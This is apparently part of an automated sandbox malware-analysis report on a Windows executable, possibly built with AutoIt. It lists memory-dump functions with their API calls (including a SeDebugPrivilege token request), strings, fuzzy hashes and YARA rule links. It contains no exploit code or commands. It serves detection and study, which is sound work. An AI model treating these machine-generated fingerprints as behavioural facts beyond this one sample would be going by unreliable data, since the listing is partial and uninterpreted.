Instruction ID: 878a48b97824640d7388666ac52426a47d5498449f7cd0784c90915ac1f2bdd7
Opcode Fuzzy Hash: bf8fc115609ae640b4760f629165e2786479c63f27bb74eddba34c72e15f8edb
Instruction Fuzzy Hash: FC11E976105A907FD2136BE6AC05FAB7B2CEF82778B210616F224950D1CF715C0186E0

Uniqueness

Uniqueness Score: -1.00%

Function 00A19023, Relevance: 6.1, APIs: 4, Instructions: 61windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00A19043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A19055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A1906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A19086

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a248e2aa7cc29e7a5ae1fe9b5e6868b58616fe32d8c812f1d56bb9e0facf3b1a
Instruction ID: 1df30a8101a6cf9638a20cfdcfe3b5f608e0b35b75e7bac44fb54bb367cb8aa5
Opcode Fuzzy Hash: a248e2aa7cc29e7a5ae1fe9b5e6868b58616fe32d8c812f1d56bb9e0facf3b1a
Instruction Fuzzy Hash: 6D115E7A901218FFEB10DFA5CD84EEEBB78FB48350F204095E604B7250C6326E50DB94

Uniqueness

Uniqueness Score: -1.00%

Function 009C1290, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 009C2612: GetWindowLongW.USER32 ref: 009C2623

DefDlgProcW.USER32(?,00000020,?), ref: 009C12D8
GetClientRect.USER32 ref: 009FB84B
GetCursorPos.USER32(?), ref: 009FB855
ScreenToClient.USER32 ref: 009FB860

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 313ca72dbc021eaac145716d5057bd360116411de2ab2e48c832da69694a467c
Instruction ID: 92aa3a0049648931c01419ccd088f8a1fea626080a6cf3df3a2ebb052a36fa22
Opcode Fuzzy Hash: 313ca72dbc021eaac145716d5057bd360116411de2ab2e48c832da69694a467c
Instruction Fuzzy Hash: 66112B3DA00019AFDB10DF94D885EFEBBB8EB46341F10045AF511E7141C731BA528BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00A24D35, Relevance: 6.1, APIs: 4, Instructions: 60synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A24D5C
MessageBoxW.USER32(?,?,?,?), ref: 00A24D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A24DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00A24DAC

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: bf8b2b24bbff82f884bed91cd4c9b1990260cc869ba06a41e57e4f29db84b5a9
Instruction ID: 00c8e648974e27e444d2fde318088e9d1f95600517607b50eab12cd3ded2c4eb
Opcode Fuzzy Hash: bf8b2b24bbff82f884bed91cd4c9b1990260cc869ba06a41e57e4f29db84b5a9
Instruction Fuzzy Hash: EF1182B6908254BFE711DBECEC48EDB7BACEB89321F144366F614D6151D271490587B0

Uniqueness

Uniqueness Score: -1.00%

Function 009C1D35, Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 009C1D73
GetStockObject.GDI32(00000011), ref: 009C1D87
SendMessageW.USER32(00000000,00000030,00000000), ref: 009C1D91

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: acd6920bacca488e9522fdb0b9960a25f9497d17b632816e3602b028ad62703c
Instruction ID: 37f07abe542c161abb95b3fc71359495f923c5577cc0e1920d683368f8c379cc
Opcode Fuzzy Hash: acd6920bacca488e9522fdb0b9960a25f9497d17b632816e3602b028ad62703c
Instruction Fuzzy Hash: 76115B76902158BFEF118FD0EC44EEA7F2DEF4A3A4F044119FA0551051C7369D61DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00A1DD22, Relevance: 6.1, APIs: 4, Instructions: 53registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00A1DD3E
LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00A1DD55
RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00A1DD6A
RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00A1DD88

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: f4541f7cb8dc2a9b3a8018baee04f6b23b1a1a5af6402a74e5b59774fb267c98
Instruction ID: db3f85cf184171ac9f3ca4204ec73023746bd6980b9c2d1b2900946ef26ab3f8
Opcode Fuzzy Hash: f4541f7cb8dc2a9b3a8018baee04f6b23b1a1a5af6402a74e5b59774fb267c98
Instruction Fuzzy Hash: 8511ADB9202304EFE720CF50EC09FE37BB8EB42758F108929E25AC6440D772A585DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A21652, Relevance: 6.1, APIs: 4, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000001,?,?,?,?,00A20218,?,00A21454,?,?,?), ref: 00A2166F
Sleep.KERNEL32(00000000,?,?,?,?,00A20218,?,00A21454,?,?,?), ref: 00A21694
QueryPerformanceCounter.KERNEL32(00000001,?,?,?,?,00A20218,?,00A21454,?,?,?), ref: 00A2169E
Sleep.KERNEL32(00000001,00000001,?,?,?,?,00A20218,?,00A21454,?,?,?), ref: 00A216D1

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: f503ef3cfe46dbf0c9bec532c3ba779b210bb3a744d8f62fb89e5513141de8a7
Instruction ID: 775d32d91494ade82cd2bbaa210b7b017cf05500a6646d3f1fd9f635d74ce93e
Opcode Fuzzy Hash: f503ef3cfe46dbf0c9bec532c3ba779b210bb3a744d8f62fb89e5513141de8a7
Instruction Fuzzy Hash: F1117C35C0042DDBCF00DFE9E949AEEBB78FF6A351F054565EA44B2140CB3195A0CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00A4B57F, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00A4B59E
ScreenToClient.USER32 ref: 00A4B5B6
ScreenToClient.USER32 ref: 00A4B5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A4B5F5

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 693db95edc9acfd5a6b5a014e56b8970a14c7c859176210e3cdb43e0d9373af3
Instruction ID: 130d193fcc023bd4d9fc3025e1a8dc509481edef48df3eb54cc11ff16ca43f1b
Opcode Fuzzy Hash: 693db95edc9acfd5a6b5a014e56b8970a14c7c859176210e3cdb43e0d9373af3
Instruction Fuzzy Hash: 7D1163B9D00249EFDB01CFE9D8849EEFBF9FB49310F109066E915E2620D735AA518F61

Uniqueness

Uniqueness Score: -1.00%

Function 009E9C04, Relevance: 6.0, APIs: 4, Instructions: 48threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,009E8D6D,009E59D3,?,?,009E1013,?), ref: 009E9C06
GetCurrentThreadId.KERNEL32 ref: 009E9C50
_free.LIBCMT ref: 009E9C5F
SetLastError.KERNEL32(00000000,009E1013,?), ref: 009E9C68

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$CurrentThread_free
String ID:
API String ID: 2419495676-0
Opcode ID: 309377ca8924d6187af4648becd7f3fd47ddce79988bf5bb1c02edecc9ff8010
Instruction ID: 19bc0cd73b5b71eff8791d6158870877ba433d1bb17627d5eb9411d528f4ad6e
Opcode Fuzzy Hash: 309377ca8924d6187af4648becd7f3fd47ddce79988bf5bb1c02edecc9ff8010
Instruction Fuzzy Hash: F8F0C8331097617ED2377BE6BD06BAB6B5CDB82771F30052AF1C9940E1CA111C4282A4

Uniqueness

Uniqueness Score: -1.00%

Function 00A4C00C, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 009C12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009C134D
Part of subcall function 009C12F3: SelectObject.GDI32(?,00000000), ref: 009C135C
Part of subcall function 009C12F3: BeginPath.GDI32(?), ref: 009C1373
Part of subcall function 009C12F3: SelectObject.GDI32(?,00000000), ref: 009C139C

MoveToEx.GDI32(00000000,00000008,00000000,00000000), ref: 00A4C030
LineTo.GDI32(00000000,00000007,?), ref: 00A4C03D
EndPath.GDI32(00000000), ref: 00A4C04D
StrokePath.GDI32(00000000), ref: 00A4C05B

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: edf05062887d2291132c074c536293c20a5e5fa65fd2d109747e90581e99452f
Instruction ID: 81fc3fde9faf9ce3670e68986dd18d7fa6e36925d77b8e3b902b2862465159ac
Opcode Fuzzy Hash: edf05062887d2291132c074c536293c20a5e5fa65fd2d109747e90581e99452f
Instruction Fuzzy Hash: 0DF05E3A142259FBDB229F94AC0DFDE3F59AFC7321F044010F615610E287760552CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A37C, Relevance: 6.0, APIs: 4, Instructions: 31threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32 ref: 00A1A399
GetWindowThreadProcessId.USER32(?,?), ref: 00A1A3AC
GetCurrentThreadId.KERNEL32 ref: 00A1A3B3
AttachThreadInput.USER32(00000000,?,00A1A554,?,00000001,00A4F910,?,00000001), ref: 00A1A3BA

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 1bbc8f85fd5fc74098e6b101a26db6b85819f97be58c9c88053c1df7f2f1b5e8
Instruction ID: 084135664fcfc17c9f77802443d4e118079d5ea362435622b2b71cbb027d630f
Opcode Fuzzy Hash: 1bbc8f85fd5fc74098e6b101a26db6b85819f97be58c9c88053c1df7f2f1b5e8
Instruction Fuzzy Hash: E5E06539142268BFDB115BA1DC0DEE77F5CEF273A1F058021F509C8060C6728581D7B0

Uniqueness

Uniqueness Score: -1.00%

Function 009C2218, Relevance: 6.0, APIs: 4, Instructions: 24COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 009C2231
SetTextColor.GDI32(?,000000FF), ref: 009C223B
SetBkMode.GDI32(?,00000001), ref: 009C2250
GetStockObject.GDI32(00000005), ref: 009C2258
GetWindowDC.USER32(?,00000000), ref: 009FC0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 009FC0E0
GetPixel.GDI32(00000000,?,00000000), ref: 009FC0F9
GetPixel.GDI32(00000000,00000000,?), ref: 009FC112
GetPixel.GDI32(00000000,?,?), ref: 009FC132
ReleaseDC.USER32 ref: 009FC13D

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 02e21e6f24a540d469e5ae274333850fe0e1ffa2dfc9cd7a04ac5741283beb78
Instruction ID: 05f1283f50d9d3af9038605502dab78a96ff7518dfa699317b77c9aa5dc3a6a4
Opcode Fuzzy Hash: 02e21e6f24a540d469e5ae274333850fe0e1ffa2dfc9cd7a04ac5741283beb78
Instruction Fuzzy Hash: 3FE0653A600148EEEF115FA8FC0DBE83B18DB46336F048366F779580E187724981DB12

Uniqueness

Uniqueness Score: -1.00%

Function 00A18C5A, Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00A18C63
OpenThreadToken.ADVAPI32(00000000,?,00A3ECE4,SeDebugPrivilege), ref: 00A18C6A
GetCurrentProcess.KERNEL32(00000028,?,?,00A3ECE4,SeDebugPrivilege), ref: 00A18C77
OpenProcessToken.ADVAPI32(00000000,?,00A3ECE4,SeDebugPrivilege), ref: 00A18C7E

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: b0e33bd2ea7c21b8a27d517302ffdf9263694d0d20ff0495d692951f63e9828d
Instruction ID: 7016c2e1a3dd8ae5dfebba549dd3b6f5a3bbd3ced7c2181f481163497cfae067
Opcode Fuzzy Hash: b0e33bd2ea7c21b8a27d517302ffdf9263694d0d20ff0495d692951f63e9828d
Instruction Fuzzy Hash: 46E0863E642221DFD7605FF46D0DB963BA8EFD2792F045824F685C9080EA394582CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A02187, Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00A02187
GetDC.USER32 ref: 00A02191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A021B1
ReleaseDC.USER32 ref: 00A021D2

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 5aecd32514becacad09138670da29a0704362778f0dd6374789d0e2560f6462a
Instruction ID: 54b4055547387e6f0724a2bcedd757df119f8b2eb57e2d490b05fa2a604d60eb
Opcode Fuzzy Hash: 5aecd32514becacad09138670da29a0704362778f0dd6374789d0e2560f6462a
Instruction Fuzzy Hash: 74E0E5B9800604EFCB01AFA4D90CB9EBFB1EB89350F128429FD5A93260DB3981429F41

Uniqueness

Uniqueness Score: -1.00%

Function 00A0219B, Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00A0219B
GetDC.USER32 ref: 00A021A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A021B1
ReleaseDC.USER32 ref: 00A021D2

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 1c2fd0a0bebdec2dd6bbf2d8501a6a31fe9ccd80570a31c8e4b61ba70e32d1fe
Instruction ID: 04cad683d9cf05c0f2a9e346c807607a3753a8b79268804c538ea36b8ba5d027
Opcode Fuzzy Hash: 1c2fd0a0bebdec2dd6bbf2d8501a6a31fe9ccd80570a31c8e4b61ba70e32d1fe
Instruction Fuzzy Hash: 1EE0E5B9800204AFCB01AFB4C908A9EBFA1EB89310F128429F95A93220DB3991429F40

Uniqueness

Uniqueness Score: -1.00%

Function 009E78D3, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 379COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 009E7A60

Strings

a/p, xrefs: 009E7B26
am/pm, xrefs: 009E7AD0

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: 9e9c7f5eea9f8ad70a499720cea20a0ced53d51b319a876b2ca02f741261aedb
Instruction ID: c63e18de44f3df02243633997b15949e2776cbc3e4156acba7c7739fc89e07f7
Opcode Fuzzy Hash: 9e9c7f5eea9f8ad70a499720cea20a0ced53d51b319a876b2ca02f741261aedb
Instruction Fuzzy Hash: 04C1F33190829ADBDB268FD6C880ABEF7B8FF45710F74485AE985AB340D2345D41C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 00A2ED8E, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 329COMMON

Download Yara Rule

Strings

X, xrefs: 00A2EFFE

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: X
API String ID: 0-3081909835
Opcode ID: 3de4d049adebdd8e2f318fe0c9a9f7b26def3ea006b1c0ddc04082b26b520590
Instruction ID: c8bdb11dfdca65e5fcee567372883ebee2cc42ba9bc931989a99b1d93d34fb9b
Opcode Fuzzy Hash: 3de4d049adebdd8e2f318fe0c9a9f7b26def3ea006b1c0ddc04082b26b520590
Instruction Fuzzy Hash: 47C15A719083509FC724EF68D985F5AB7E4AF85310F04893DF8999B2A2DB30ED45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A1B7B6, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00A1B981

Strings

AutoIt3GUI, xrefs: 00A1B8F9
Container, xrefs: 00A1B8FE

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: dcbcac774536c6a426c6b305617a91491a87274299e4a0e3baaf13ba551e494a
Instruction ID: e93a0ef75c546215692e9f472eaefe542a3e5dd16be284b5d6f6001d3b8a6922
Opcode Fuzzy Hash: dcbcac774536c6a426c6b305617a91491a87274299e4a0e3baaf13ba551e494a
Instruction Fuzzy Hash: 92915E71610201AFDB24DF68C985BA6BBF8FF49710F10856EF949CB691DB71E881CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009D2AB7, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 009D2AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 009D2AE1

Strings

@, xrefs: 009D2AD5

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 726fd4de91a912afc280239c9e972b18cead8037cc53ee8339f926082863b0cf
Instruction ID: 4ac028e2e061d76334c51f240561c4d4dd703814f60c1836b37a96260fa4dec1
Opcode Fuzzy Hash: 726fd4de91a912afc280239c9e972b18cead8037cc53ee8339f926082863b0cf
Instruction Fuzzy Hash: 27513671818B449BD320EF51D88ABABBBF8FBC4310F42885DF1D9811A1DB718529CB27

Uniqueness

Uniqueness Score: -1.00%

Function 00A47CE0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00A47DD0
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A47DE5

Strings

', xrefs: 00A47D39

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 2225e76149c0a15138fadee454351809184d17986c7df01f7136aa0fb7c209cb
Instruction ID: 59ffec7f62f3f6f7603db49499b86e3dfc17894f5b0e860b93212aa6ad6ba21e
Opcode Fuzzy Hash: 2225e76149c0a15138fadee454351809184d17986c7df01f7136aa0fb7c209cb
Instruction Fuzzy Hash: A6410878E052499FDB14CFA8D981BEE7BB9FF49300F10016AE905AB355D771A941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A46CD2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?,?,?,?,?), ref: 00A46D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,?), ref: 00A46DC2

Strings

static, xrefs: 00A46D22

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 3219de7c11b895eeceb48be71f39202d8eaac659d97e770489edfc70346a9db5
Instruction ID: 4b137877849b8409e890f1ee9b13a625e3d6fbdee50dfca62b0be5d3e145990b
